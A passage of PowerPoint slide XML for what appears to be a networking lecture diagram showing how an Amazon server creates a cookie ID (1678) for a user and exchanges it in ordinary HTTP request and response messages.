                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B67849-B4EA-4D85-8D25-11700462A084}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3124" y="2762"/>
                <a:ext cx="1689" cy="392"/>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lnSpc>
                    <a:spcPct val="80000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>usual http request msg</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>cookie: 1678</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFE020C-C3A8-4591-8E32-BE31DBFD4831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4090989" y="5580064"/>
            <a:ext cx="3305175" cy="407987"/>
            <a:chOff x="1617" y="3515"/>
            <a:chExt cx="2082" cy="257"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27694" name="Line 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1278B795-C44B-4182-97B0-01EEFF0D6EAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1617" y="3515"/>
              <a:ext cx="2082" cy="24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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27695" name="Group 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13244905-F805-44FC-A206-8D8FC3F6CE93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1753" y="3535"/>
              <a:ext cx="1743" cy="237"/>
              <a:chOff x="3268" y="2846"/>
              <a:chExt cx="1743" cy="237"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27696" name="Rectangle 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536C220C-92BD-4AA8-804A-B55C0E895DEE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3282" y="2856"/>
                <a:ext cx="1692" cy="198"/>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697" name="Text Box 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B73ED52-6E14-4091-B340-C9832AB9B46D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3268" y="2846"/>
                <a:ext cx="1743" cy="237"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>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1800">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>usual http response msg</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="it-IT" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38940" name="Text Box 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F769683B-3300-48C0-BECD-9AB4FF645164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7458075" y="3716338"/>
            <a:ext cx="1138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2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38941" name="Text Box 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE6B61F-1691-44AB-8043-BD5836EE4D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7415213" y="5175250"/>
            <a:ext cx="1223962"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2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>spectific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38942" name="Text Box 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C44F18E9-2296-4295-88DF-5B599A01A73D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7034214" y="2063750"/>
            <a:ext cx="2022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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Amazon server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creates ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1678 for user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27664" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5461949-D5E3-47BD-89A1-D5BE94466496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9912350" y="3319464"/>
            <a:ext cx="293688" cy="395287"/>
            <a:chOff x="5115" y="1292"/>
            <a:chExt cx="185" cy="249"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27690" name="Oval 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFAD787-5B67-4AB9-9D84-2F1D8BDBF638}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5115" y="1292"/>
              <a:ext cx="177" cy="6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691" name="Oval 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A1F3AA-A350-425A-8456-EA85682F6D15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5119" y="1472"/>
              <a:ext cx="177" cy="69"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27692" name="Line 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73AC8176-0E70-46E8-83C5-CE35C5009061}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5300" y="1315"/>
              <a:ext cx="0" cy="19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sp>
          <p:nvSpPr>
            <p:cNvPr id="27693" name="Line 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F9B159-B352-47A7-ACA1-00634D4BF8E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5115" y="1331"/>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it-IT"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFC72CB-2657-45E7-8D23-A091D787B181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9009063" y="2517775"/>
            <a:ext cx="1111250" cy="742950"/>
            <a:chOff x="4715" y="1586"/>
            <a:chExt cx="700" cy="468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27688" name="Line 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895BE813-6182-4F0A-AD55-510FF9C0F621}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4715" y="1692"/>
              <a:ext cx="546" cy="3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7689" name="Text Box 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0582D888-78B2-4477-9FF4-4E7F7E603863}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2225390">
              <a:off x="4865" y="1586"/>
              <a:ext cx="55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lnSpc>
                  <a:spcPct val="75000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>create</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="75000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>    entry</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{796AD108-AFAC-460D-8F3C-B01CD07E11D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8631238" y="3614738"/>
            <a:ext cx="1109662" cy="476250"/>
            <a:chOff x="4477" y="2277"/>
            <a:chExt cx="699" cy="300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27686" name="Line 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769983FB-CFA7-4B76-983D-F2C9DD5C5F28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4477" y="2277"/>
              <a:ext cx="692" cy="269"/>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7687" name="Text Box 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C83997-AF37-4910-9DE0-EA43F3B53C4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1144414">
              <a:off x="4658" y="2364"/>
              <a:ext cx="51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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>access</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57915941-C017-4B9F-9C0E-A2FD728205BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8753475" y="3870325"/>
            <a:ext cx="1195388" cy="1282700"/>
            <a:chOff x="4554" y="2438"/>
            <a:chExt cx="753" cy="808"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27684" name="Line 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D14C02B-E950-4166-8E5B-281978BC0D73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4554" y="2438"/>
              <a:ext cx="753" cy="808"/>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it-IT"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27685" name="Text Box 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01E89E1-B0FC-4ED9-AA78-A93ACEB312C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-2728275">
              <a:off x="4815" y="2786"/>
              <a:ext cx="51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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>access</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C3DAFD-DEBE-4D6D-9499-3790F3A7793D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1744664" y="3309938"/>
            <a:ext cx="1787525" cy="933450"/>
            <a:chOff x="654" y="1693"/>
            <a:chExt cx="1126" cy="588"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27680" name="AutoShape 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9952AB9-67C3-44D1-BAA8-0E91A162C21F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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endParaRPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27681" name="Group 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C282A0B-AFD4-4C12-97A0-EC5ADA186D1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="765" y="1693"/>
              <a:ext cx="839" cy="588"/>
              <a:chOff x="765" y="1693"/>
              <a:chExt cx="839" cy="588"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27682" name="Text Box 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB3929B0-A820-41D4-B54B-B66D872A6C96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="980" y="1693"/>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b="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Cookies</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27683" name="Text Box 46">
                <a:extLst>
